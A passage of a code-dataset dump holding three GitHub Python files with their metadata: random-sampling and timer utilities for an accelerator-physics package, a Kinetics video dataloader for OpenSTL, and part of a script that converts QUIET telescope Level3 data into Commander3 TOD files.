axes: List[float]) -> List[float]:\n \"\"\"\n 超椭球球面均匀分布\n axes 为各个轴的半轴长,例如[3.5, 7.5, 3.5, 7.5, 0.08]\n !!! 注意:因为超椭球的表面积很难计算(椭圆积分),所以先当作超球体处理,然后各轴拉伸为超椭球\n 这样的分布,不再是标准的均匀分布\n \"\"\"\n dim = len(axes)\n p = cls.uniformly_distributed_at_hyperespherical_surface(dim)\n for i in range(dim):\n p[i] *= axes[i]\n return p\n\n @classmethod\n def uniformly_distributed_in_hypereellipsoid(cls, axes: List[float]) -> List[float]:\n \"\"\"\n 超椭球球内均匀分布\n axes 为各个轴的半轴长,例如[3.5, 7.5, 3.5, 7.5, 0.08]\n \"\"\"\n dim = len(axes)\n while True:\n p = [random.uniform(-axes[i], axes[i]) for i in range(dim)]\n r = 0.0\n for i in range(dim):\n r += (p[i]**2)/(axes[i]**2)\n if r <= 1:\n return p\n\n @classmethod\n def uniformly_distributed_in_hyperesphere(cls, d: int, r: float = 1.0) -> List[float]:\n \"\"\"\n 超球体内均匀分布\n\n d 维度\n r 半径\n \"\"\"\n return cls.uniformly_distributed_in_hypereellipsoid([r]*d)\n\n @classmethod\n def gauss(cls, mu: float = 0.0, sigma: float = 1.0) -> float:\n \"\"\"\n 高斯分布\n\n since v0.1.4\n \"\"\"\n return random.gauss(mu, sigma)\n\n @classmethod\n def gauss_limited(cls, mu: float = 0.0, sigma: float = 1.0, limit: float = 2.0) -> float:\n \"\"\"\n 高斯分布\n\n since v0.1.4\n \"\"\"\n if limit == 0.0 or limit == -0.0:\n raise ValueError(f\"limit 取值不能为 0.0\")\n\n\n limit = abs(limit)\n\n while True:\n r = random.gauss(mu, sigma)\n if r < limit and r > -limit:\n return r\n\n @classmethod\n def gauss_multi_dimension(cls, mu_list: List[float], sigma_list: List[float]) -> List[float]:\n \"\"\"\n 多维无关高斯分布\n\n since v0.1.4\n \"\"\"\n len_mu = len(mu_list)\n len_sigma = len(sigma_list)\n\n if len_mu != len_sigma:\n raise ValueError(\n \"gauss_multi_dimension mu_list 和 sigma_list 维度不同一\")\n\n return [cls.gauss(mu_list[i], sigma_list[i]) for i in range(len_mu)]\n\n class Timer:\n \"\"\"\n 计时器\n 2021年6月16日 新增\n \"\"\"\n\n def __init__(self) -> None:\n self.time = time.time()\n\n def reset(self) -> None:\n self.time = time.time()\n\n def period(self) -> float:\n return time.time() - self.time\n\n @staticmethod\n def combine(list_a: List[T], list_b: List[V]) -> List[Tuple[T, V]]:\n \"\"\"\n 组合\n 输入两个长度一样的数组 [1,2,3...] [a,b,c...]\n 返回组合数组 [\n (1,a),\n (2,b),\n (3,c),\n ...\n ]\n\n 2021年6月16日 新增\n \"\"\"\n len_a = len(list_a)\n len_b = len(list_b)\n if len_a != len_b:\n print(f\"数组长度不一致,组合时取小数组\")\n print(f\"list_a = {list_a}\")\n print(f\"list_b = {list_b}\")\n\n length = min(len_a, len_b)\n\n ret: List[Tuple[T, V]] = []\n\n for i in range(length):\n ret.append(\n (list_a[i], list_b[i],)\n )\n\n return ret\n", "repo_name": "madokast/cctpy", "sub_path": "final_code/packages/base_utils.py", "file_name": "base_utils.py", "file_ext": "py", "file_size_in_byte": 39084, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "typing.Union", "line_number": 36, "usage_type": "name"}, {"api_name": "packages.point.P2", "line_number": 36, "usage_type": "name"}, {"api_name": "packages.point.P3", "line_number": 36, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 37, "usage_type": "name"}, {"api_name": "packages.point.P2", "line_number": 37, "usage_type": "name"}, {"api_name": "packages.point.P3", "line_number": 37, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 39, "usage_type": "name"}, {"api_name": "packages.point.P2", "line_number": 61, "usage_type": "argument"}, {"api_name": "packages.point.P3", "line_number": 62, "usage_type": "argument"}, {"api_name": "typing.Union", "line_number": 82, "usage_type": "name"}, {"api_name": "packages.point.P2", "line_number": 82, "usage_type": "name"}, {"api_name": "packages.point.P3", "line_number": 82, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 83, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 83, "usage_type": "name"}, {"api_name": "packages.point.P2", "line_number": 83, "usage_type": "name"}, {"api_name": "packages.point.P3", "line_number": 83, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 94, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 94, "usage_type": "name"}, {"api_name": "math.pi", "line_number": 101, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 102, "usage_type": "argument"}, {"api_name": "typing.Union", "line_number": 95, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 95, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 109, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 109, "usage_type": "name"}, {"api_name": "math.pi", "line_number": 116, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 117, "usage_type": "argument"}, {"api_name": "numpy.ndarray", "line_number": 119, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 120, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 110, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 110, "usage_type": "name"}, {"api_name": "packages.point.P2", "line_number": 125, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 140, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 143, "usage_type": "call"}, {"api_name": "numpy.linalg.inv", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 144, "usage_type": "attribute"}, {"api_name": "packages.point.P2.from_numpy_ndarry", "line_number": 145, "usage_type": "call"}, {"api_name": "packages.point.P2", "line_number": 145, "usage_type": "name"}, {"api_name": "math.sqrt", "line_number": 147, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 148, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 149, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 125, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 154, "usage_type": "name"}, {"api_name": "numpy.polyfit", "line_number": 165, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 169, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 169, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 186, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 186, "usage_type": "name"}, {"api_name": "packages.point.P2", "line_number": 186, "usage_type": "name"}, {"api_name": "packages.point.P3", "line_number": 186, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 187, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 187, "usage_type": "name"}, {"api_name": "packages.point.P2", "line_number": 187, "usage_type": "name"}, {"api_name": "packages.point.P3", "line_number": 187, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 194, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 194, "usage_type": "name"}, {"api_name": "packages.point.P2", "line_number": 194, "usage_type": "name"}, {"api_name": "packages.point.P3", "line_number": 194, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 200, "usage_type": "name"}, {"api_name": "packages.point.P2", "line_number": 200, "usage_type": "name"}, {"api_name": "packages.point.P3", "line_number": 200, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 195, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 195, "usage_type": "name"}, {"api_name": "packages.point.P2", "line_number": 195, "usage_type": "name"}, {"api_name": "packages.point.P3", "line_number": 195, "usage_type": "name"}, {"api_name": "math.isnan", "line_number": 234, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 242, "usage_type": "name"}, {"api_name": "sys._getframe", "line_number": 258, "usage_type": "call"}, {"api_name": "typing.Callable", "line_number": 268, "usage_type": "name"}, {"api_name": "math.ceil", "line_number": 284, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 271, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 271, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 271, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 317, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 318, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 318, "usage_type": "name"}, {"api_name": "scipy.integrate.solve_ivp", "line_number": 344, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 323, "usage_type": "attribute"}, {"api_name": "typing.Callable", "line_number": 371, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 372, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 373, "usage_type": "name"}, {"api_name": "multiprocessing.current_process", "line_number": 393, "usage_type": "call"}, {"api_name": "os.cpu_count", "line_number": 422, "usage_type": "call"}, {"api_name": "time.time", "line_number": 428, "usage_type": "call"}, {"api_name": "multiprocessing.Pool", "line_number": 429, "usage_type": "call"}, {"api_name": "time.time", "line_number": 436, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 376, "usage_type": "name"}, {"api_name": "packages.point.P2", "line_number": 491, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 494, "usage_type": "attribute"}, {"api_name": "math.pi", "line_number": 496, "usage_type": "attribute"}, {"api_name": "math.pi", "line_number": 497, "usage_type": "attribute"}, {"api_name": "math.pi", "line_number": 499, "usage_type": "attribute"}, {"api_name": "math.sqrt", "line_number": 500, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 503, "usage_type": "attribute"}, {"api_name": "math.sqrt", "line_number": 504, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 509, "usage_type": "attribute"}, {"api_name": "math.tan", "line_number": 510, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 511, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 515, "usage_type": "attribute"}, {"api_name": "math.pi", "line_number": 516, "usage_type": "attribute"}, {"api_name": "math.tan", "line_number": 517, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 518, "usage_type": "call"}, {"api_name": "packages.point.P2", "line_number": 480, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 525, "usage_type": "name"}, {"api_name": "math.pi", "line_number": 544, "usage_type": "attribute"}, {"api_name": "math.pi", "line_number": 545, "usage_type": "attribute"}, {"api_name": "packages.point.P2", "line_number": 552, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 576, "usage_type": "name"}, {"api_name": "packages.point.P2", "line_number": 576, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 611, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 613, "usage_type": "name"}, {"api_name": "typing.Iterable", "line_number": 632, "usage_type": "name"}, {"api_name": "numpy.max", "line_number": 643, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 649, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 649, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 655, "usage_type": "call"}, {"api_name": "numpy.var", "line_number": 661, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 706, "usage_type": "name"}, {"api_name": "random.random", "line_number": 747, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 755, "usage_type": "attribute"}, {"api_name": "random.random", "line_number": 755, "usage_type": "call"}, {"api_name": "packages.point.P2", "line_number": 756, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 756, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 756, "usage_type": "call"}, {"api_name": "packages.point.P2", "line_number": 750, "usage_type": "name"}, {"api_name": "random.uniform", "line_number": 766, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 767, "usage_type": "call"}, {"api_name": "packages.point.P2", "line_number": 769, "usage_type": "call"}, {"api_name": "packages.point.P2", "line_number": 759, "usage_type": "name"}, {"api_name": "random.uniform", "line_number": 783, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 783, "usage_type": "attribute"}, {"api_name": "random.uniform", "line_number": 784, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 784, "usage_type": "attribute"}, {"api_name": "math.pi", "line_number": 785, "usage_type": "attribute"}, {"api_name": "math.sin", "line_number": 785, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 786, "usage_type": "call"}, {"api_name": "packages.point.P3", "line_number": 787, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 788, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 788, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 789, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 790, "usage_type": "call"}, {"api_name": "packages.point.P3", "line_number": 772, "usage_type": "name"}, {"api_name": "random.uniform", "line_number": 801, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 802, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 803, "usage_type": "call"}, {"api_name": "packages.point.P3", "line_number": 805, "usage_type": "call"}, {"api_name": "packages.point.P3", "line_number": 794, "usage_type": "name"}, {"api_name": "random.uniform", "line_number": 820, "usage_type": "call"}, {"api_name": "packages.point.P2", "line_number": 808, "usage_type": "name"}, {"api_name": "random.uniform", "line_number": 836, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 837, "usage_type": "call"}, {"api_name": "packages.point.P2", "line_number": 839, "usage_type": "call"}, {"api_name": "packages.point.P2", "line_number": 825, "usage_type": "name"}, {"api_name": "random.uniform", "line_number": 871, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 871, "usage_type": "attribute"}, {"api_name": "random.uniform", "line_number": 874, "usage_type": "call"}, {"api_name": "packages.point.P3", "line_number": 892, "usage_type": "call"}, {"api_name": "packages.point.P3", "line_number": 842, "usage_type": "name"}, {"api_name": "random.uniform", "line_number": 909, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 910, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 911, "usage_type": "call"}, {"api_name": "packages.point.P3", "line_number": 913, "usage_type": "call"}, {"api_name": "packages.point.P3", "line_number": 895, "usage_type": "name"}, {"api_name": "math.factorial", "line_number": 928, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 929, "usage_type": "attribute"}, {"api_name": "math.factorial", "line_number": 929, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 934, "usage_type": "attribute"}, {"api_name": "math.factorial", "line_number": 934, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 976, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 980, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 983, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 954, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 992, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 1006, "usage_type": "name"}, {"api_name": "random.uniform", "line_number": 1013, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 1021, "usage_type": "name"}, {"api_name": "random.gauss", "line_number": 1037, "usage_type": "call"}, {"api_name": "random.gauss", "line_number": 1053, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 1058, "usage_type": "name"}, {"api_name": "time.time", "line_number": 1080, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1083, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1086, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 1089, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 1111, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 1111, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 1089, "usage_type": "name"}]} +{"seq_id": "26247504368", "text": "import os\nimport numpy as np\nimport warnings\n\nfrom torch.utils.data import Dataset\nfrom openstl.datasets.pipelines.transforms import (Compose, CenterCrop, ClipToTensor,\n Resize, Normalize)\nfrom openstl.datasets.utils import create_loader\n\ntry:\n from decord import VideoReader, cpu\nexcept ImportError:\n VideoReader, cpu = None, None\n\n\ndef int_to_str(num, str_len=6):\n assert isinstance(num, (int, str))\n num = str(num)\n str_num = (str_len - len(num)) * '0' + num\n return str_num\n\n\nclass KineticsDataset(Dataset):\n \"\"\" Video Classification Kinetics Dataset\n `_\n\n Args:\n data_root (str): Path to the dataset.\n list_path (str): Path to the txt list file.\n image_size (int: The target resolution of Human3.6M images.\n pre_seq_length (int): The input sequence length.\n aft_seq_length (int): The output sequence length for prediction.\n frame_sample_rate (int): Sampling step in the time dimension (defaults to 2).\n use_augment (bool): Whether to use augmentations (defaults to False).\n \"\"\"\n\n def __init__(self, data_root, list_path, image_size=256,\n pre_seq_length=4, aft_seq_length=4, frame_sample_rate=2,\n keep_aspect_ratio=False, num_segment=1, use_augment=False):\n super(KineticsDataset,self).__init__()\n self.data_root = data_root\n self.image_size = image_size\n self.pre_seq_length = pre_seq_length\n self.aft_seq_length = aft_seq_length\n self.seq_length = pre_seq_length + aft_seq_length\n self.use_augment = use_augment\n self.input_shape = (self.seq_length, self.image_size, self.image_size, 3)\n\n self.frame_sample_rate = frame_sample_rate\n self.keep_aspect_ratio = keep_aspect_ratio\n self.num_segment = num_segment\n assert list_path.endswith('csv')\n\n import pandas as pd\n file_list = pd.read_csv(list_path, header=None, delimiter=',')\n dataset_samples = list(file_list.values[1:, 1])\n self.label_array = list(file_list.values[1:, 0])\n self.mode = list(file_list.values[1:, 4])[0]\n time_start, time_end = list(file_list.values[1:, 2]), list(file_list.values[1:, 3])\n self.file_list = list()\n for i,name in enumerate(dataset_samples):\n self.file_list.append(os.path.join(data_root, self.mode, \"{}_{}_{}.mp4\".format(\n name, int_to_str(time_start[i]), int_to_str(time_end[i]))))\n\n self.data_transform = Compose([\n Resize(image_size, interpolation='bilinear'),\n CenterCrop(size=(image_size, image_size)),\n ClipToTensor(),\n Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n ])\n\n self.mean = None\n self.std = None\n\n def loadvideo_decord(self, sample, sample_rate_scale=1):\n \"\"\"Load video content using Decord\"\"\"\n fname = sample\n\n if not (os.path.exists(fname)):\n return []\n\n # avoid hanging issue\n if os.path.getsize(fname) < 1 * 1024:\n print('SKIP: ', fname, \" - \", os.path.getsize(fname))\n return []\n try:\n if self.keep_aspect_ratio:\n vr = VideoReader(fname, num_threads=1, ctx=cpu(0))\n else:\n vr = VideoReader(fname, width=self.image_size, height=self.image_size,\n num_threads=1, ctx=cpu(0))\n except:\n print(\"video cannot be loaded by decord: \", fname)\n return []\n\n if self.mode == 'test':\n all_index = [x for x in range(0, len(vr), self.frame_sample_rate)]\n while len(all_index) < self.seq_length:\n all_index.append(all_index[-1])\n vr.seek(0)\n buffer = vr.get_batch(all_index).asnumpy()\n return buffer\n\n # handle temporal segments\n converted_len = int(self.seq_length * self.frame_sample_rate)\n seg_len = len(vr) // self.num_segment\n\n all_index = []\n for i in range(self.num_segment):\n if seg_len <= converted_len:\n index = np.linspace(0, seg_len, num=seg_len // self.frame_sample_rate)\n index = np.concatenate((index, np.ones(\n self.seq_length - seg_len // self.frame_sample_rate) * seg_len))\n index = np.clip(index, 0, seg_len - 1).astype(np.int64)\n else:\n end_idx = np.random.randint(converted_len, seg_len)\n str_idx = end_idx - converted_len\n index = np.linspace(str_idx, end_idx, num=self.seq_length)\n index = np.clip(index, str_idx, end_idx - 1).astype(np.int64)\n index = index + i*seg_len\n all_index.extend(list(index))\n\n all_index = all_index[::int(sample_rate_scale)]\n vr.seek(0)\n buffer = vr.get_batch(all_index).asnumpy()\n return buffer\n\n def _augment_seq(self, buffer):\n \"\"\"Augmentations for video\"\"\"\n raise NotImplementedError\n\n def __len__(self):\n return len(self.file_list)\n\n def __getitem__(self, idx):\n sample = self.file_list[idx]\n buffer = self.loadvideo_decord(sample)\n if len(buffer) == 0:\n while len(buffer) == 0:\n warnings.warn(\"video {} not correctly loaded during {}ing\".format(sample, self.mode))\n index = np.random.randint(self.__len__())\n sample = self.file_list[index]\n buffer = self.loadvideo_decord(sample)\n\n # augmentation\n if self.use_augment:\n buffer = self._augment_seq(buffer)\n\n # transform\n buffer = self.data_transform(buffer).permute(1, 0, 2, 3) # (C, T, H, W) -> (T, C, H, W)\n data = buffer[0:self.pre_seq_length, ...]\n labels = buffer[self.aft_seq_length:self.seq_length, ...]\n # print(sample, buffer.shape, data.shape, labels.shape)\n\n return data, labels\n\n\ndef load_data(batch_size, val_batch_size, data_root, num_workers=4, data_name='kinetics400',\n pre_seq_length=4, aft_seq_length=4, in_shape=[4, 3, 256, 256],\n distributed=False, use_augment=False, use_prefetcher=False, drop_last=False):\n\n assert data_name in ['kinetics400', 'kinetics600', 'kinetics700']\n data_root = os.path.join(data_root, data_name)\n image_size = in_shape[-1] if in_shape is not None else 256\n train_set = KineticsDataset(data_root, os.path.join(data_root, 'annotations/train.csv'), image_size,\n pre_seq_length=pre_seq_length, aft_seq_length=aft_seq_length,\n frame_sample_rate=2, keep_aspect_ratio=True, use_augment=use_augment)\n val_set = KineticsDataset(data_root, os.path.join(data_root, 'annotations/val.csv'), image_size,\n pre_seq_length=pre_seq_length, aft_seq_length=aft_seq_length,\n frame_sample_rate=2, keep_aspect_ratio=True, use_augment=False)\n test_set = KineticsDataset(data_root, os.path.join(data_root, 'annotations/test.csv'), image_size,\n pre_seq_length=pre_seq_length, aft_seq_length=aft_seq_length,\n frame_sample_rate=2, keep_aspect_ratio=True, use_augment=False)\n dataloader_train = create_loader(train_set,\n batch_size=batch_size,\n shuffle=True, is_training=True,\n pin_memory=True, drop_last=True,\n num_workers=num_workers,\n distributed=distributed, use_prefetcher=use_prefetcher)\n dataloader_test = create_loader(test_set,\n batch_size=val_batch_size,\n shuffle=False, is_training=False,\n pin_memory=True, drop_last=drop_last,\n num_workers=num_workers,\n distributed=distributed, use_prefetcher=use_prefetcher)\n dataloader_val = create_loader(val_set,\n batch_size=val_batch_size,\n shuffle=False, is_training=False,\n pin_memory=True, drop_last=drop_last,\n num_workers=num_workers,\n distributed=distributed, use_prefetcher=use_prefetcher)\n\n return dataloader_train, dataloader_val, dataloader_test\n\n\nif __name__ == '__main__':\n from openstl.utils import init_dist\n os.environ['LOCAL_RANK'] = str(0)\n os.environ['RANK'] = str(0)\n os.environ['MASTER_ADDR'] = 'localhost'\n os.environ['MASTER_PORT'] = '12357'\n dist_params = dict(launcher='pytorch', backend='nccl', init_method='env://', world_size=1)\n init_dist(**dist_params)\n\n dataloader_train, _, dataloader_test = \\\n load_data(batch_size=16,\n val_batch_size=4,\n data_root='../../data/',\n num_workers=4,\n pre_seq_length=4, aft_seq_length=4,\n use_prefetcher=True, distributed=True)\n\n print(len(dataloader_train), len(dataloader_test))\n for item in dataloader_train:\n print(item[0].shape, item[1].shape)\n break\n for item in dataloader_test:\n print(item[0].shape, item[1].shape)\n break\n", "repo_name": "chengtan9907/OpenSTL", "sub_path": "openstl/datasets/dataloader_kinetics.py", "file_name": "dataloader_kinetics.py", "file_ext": "py", "file_size_in_byte": 9510, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 403, "dataset": "github-code", "pt": "61", "api": [{"api_name": "decord.VideoReader", "line_number": 13, "usage_type": "name"}, {"api_name": "decord.cpu", "line_number": 13, "usage_type": "name"}, {"api_name": "torch.utils.data.Dataset", "line_number": 23, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path", "line_number": 62, "usage_type": "attribute"}, {"api_name": "openstl.datasets.pipelines.transforms.Compose", "line_number": 65, "usage_type": "call"}, {"api_name": "openstl.datasets.pipelines.transforms.Resize", "line_number": 66, "usage_type": "call"}, {"api_name": "openstl.datasets.pipelines.transforms.CenterCrop", "line_number": 67, "usage_type": "call"}, {"api_name": "openstl.datasets.pipelines.transforms.ClipToTensor", "line_number": 68, "usage_type": "call"}, {"api_name": "openstl.datasets.pipelines.transforms.Normalize", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 79, "usage_type": "call"}, {"api_name": "os.path", "line_number": 79, "usage_type": "attribute"}, {"api_name": "os.path.getsize", "line_number": 83, "usage_type": "call"}, {"api_name": "os.path", "line_number": 83, "usage_type": "attribute"}, {"api_name": "os.path.getsize", "line_number": 84, "usage_type": "call"}, {"api_name": "os.path", "line_number": 84, "usage_type": "attribute"}, {"api_name": "decord.VideoReader", "line_number": 88, "usage_type": "call"}, {"api_name": "decord.cpu", "line_number": 88, "usage_type": "call"}, {"api_name": "decord.VideoReader", "line_number": 90, "usage_type": "call"}, {"api_name": "decord.cpu", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.int64", "line_number": 114, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 116, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 116, "usage_type": "attribute"}, {"api_name": "numpy.linspace", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.int64", "line_number": 119, "usage_type": "attribute"}, {"api_name": "warnings.warn", "line_number": 140, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 141, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 163, "usage_type": "call"}, {"api_name": "os.path", "line_number": 163, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 165, "usage_type": "call"}, {"api_name": "os.path", "line_number": 165, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 168, "usage_type": "call"}, {"api_name": "os.path", "line_number": 168, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 171, "usage_type": "call"}, {"api_name": "os.path", "line_number": 171, "usage_type": "attribute"}, {"api_name": "openstl.datasets.utils.create_loader", "line_number": 174, "usage_type": "call"}, {"api_name": "openstl.datasets.utils.create_loader", "line_number": 180, "usage_type": "call"}, {"api_name": "openstl.datasets.utils.create_loader", "line_number": 186, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 198, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 199, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 200, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 201, "usage_type": "attribute"}, {"api_name": "openstl.utils.init_dist", "line_number": 203, "usage_type": "call"}]} +{"seq_id": "18743822059", "text": "#---------------------------------------------\nimport os\nimport numpy as np\nimport healpy as hp \nimport h5py\nimport math\nimport time\nimport argparse\nimport re\nfrom tqdm import tqdm\nimport multiprocessing as mp\nfrom joblib import cpu_count, Parallel, delayed, parallel_backend\nfrom pathlib import Path\n# Getting full path to Mathew's library as an object\ncommander_tools_path = Path(__file__).absolute().parents[2].joinpath('python','commander_tools').resolve()\n# Appending the path to `PYTHONPATH`, so no need to \n# modify it externally (in your `.bashrc` etc.)\nimport sys\nsys.path.append(str(commander_tools_path))\n# Importing necessary modules from Mathew's library \nfrom tod_tools import commander_tod as comm_tod\n#from tod_tools import huffman\n#---------------------------------------------\n\"\"\"\nThis script creates Commander3 suitable input \ndata files from QUIET Level3 data. \n\"\"\"\n#---------------------------------------------\n\ndef main():\n \"\"\"\n Main method of the script\n \"\"\"\n #nprocs = mp.cpu_count()\n #nprocs = joblib.cpu_count()\n nprocs = cpu_count()\n level3_dir = Path('/mn/stornext/d16/cmbco/bp/maksym/quiet/data/Q/ces/patch_gc') \n output_dir = Path('/mn/stornext/d16/cmbco/bp/maksym/quiet/data/Q/ces/patch_gc/output')\n if not Path.is_dir(output_dir):\n Path.mkdir(output_dir)\n version = np.string_('0.0.2')\n freqs = ['Q']\n #---------------------------------------------\n # Retrieving data\n #---------------------------------------------\n # Getting file names inside specified directory and removing the path component\n level3_data_files = sorted(level3_dir.rglob('*.hdf')) \n level3_data_files = [data_file.name for data_file in level3_data_files]\n # Retrieving CES values from the file names \n compiled_pattern = re.compile('[\\d]')\n level3_ces_nums = [int(\"\".join(compiled_pattern.findall(data_file))) \n for data_file in level3_data_files] \n #---------------------------------------------\n with parallel_backend(backend=\"multiprocessing\", n_jobs=nprocs):\n manager = mp.Manager()\n # Initialising tod object\n dicts = {freqs[0]:manager.dict()}#, 44:manager.dict(), 70:manager.dict()}\n ctod = comm_tod.commander_tod(output_dir, 'QUIET', version, dicts=dicts, overwrite=True)\n #\n x = Parallel(verbose=2)(delayed(make_od)\n (level3_dir, level3_data_files, level3_ces_nums, ctod, \n version, freqs, dicts, k) for k in range(len(level3_ces_nums)))\n #make_od(level3_dir, output_dir, version, freqs, dicts)\n # making filelist\n ctod.make_filelists()\n\n\ndef make_od(level3_dir, level3_data_files, \n level3_ces_nums, ctod, version, freqs, dicts, k):\n \"\"\"\n Method to process one file/CES\n \"\"\"\n # Working with all the files for a given patch\n #for i in tqdm(range(3)):#len(level3_ces_nums)):\n # Retrieving data from old Level3 files \n readin_file = h5py.File(level3_dir / level3_data_files[k], 'r')\n print(f\"Working with file: {level3_data_files[k]}\")\n # Things to include per detector\n alpha = np.array(readin_file.get('alpha'))\n fknee = np.array(readin_file.get('fknee'))\n gain = np.array(readin_file.get('gain'))\n sigma0 = np.array(readin_file.get('sigma0'))\n tods = np.array(readin_file.get('tod'))\n tp = np.array(readin_file.get('tp'))\n # Things to include into common group \n coord_sys = np.array(readin_file.get('coord_sys'))\n nside = np.array(readin_file.get('nside'))\n samprate = np.array(readin_file.get('samprate'))\n scanfreq = np.array(readin_file.get('scanfreq'))\n time_vals = np.array(readin_file.get('time'))\n time_gain = np.array(readin_file.get('time_gain'))\n # Retrieving pointings which will be compressed\n pointing = np.array(readin_file.get('point'))\n point_objrel = np.array(readin_file.get('point_objrel'))\n # Converting pointings to pixels\n phi = pointing[:,:,0]\n theta = 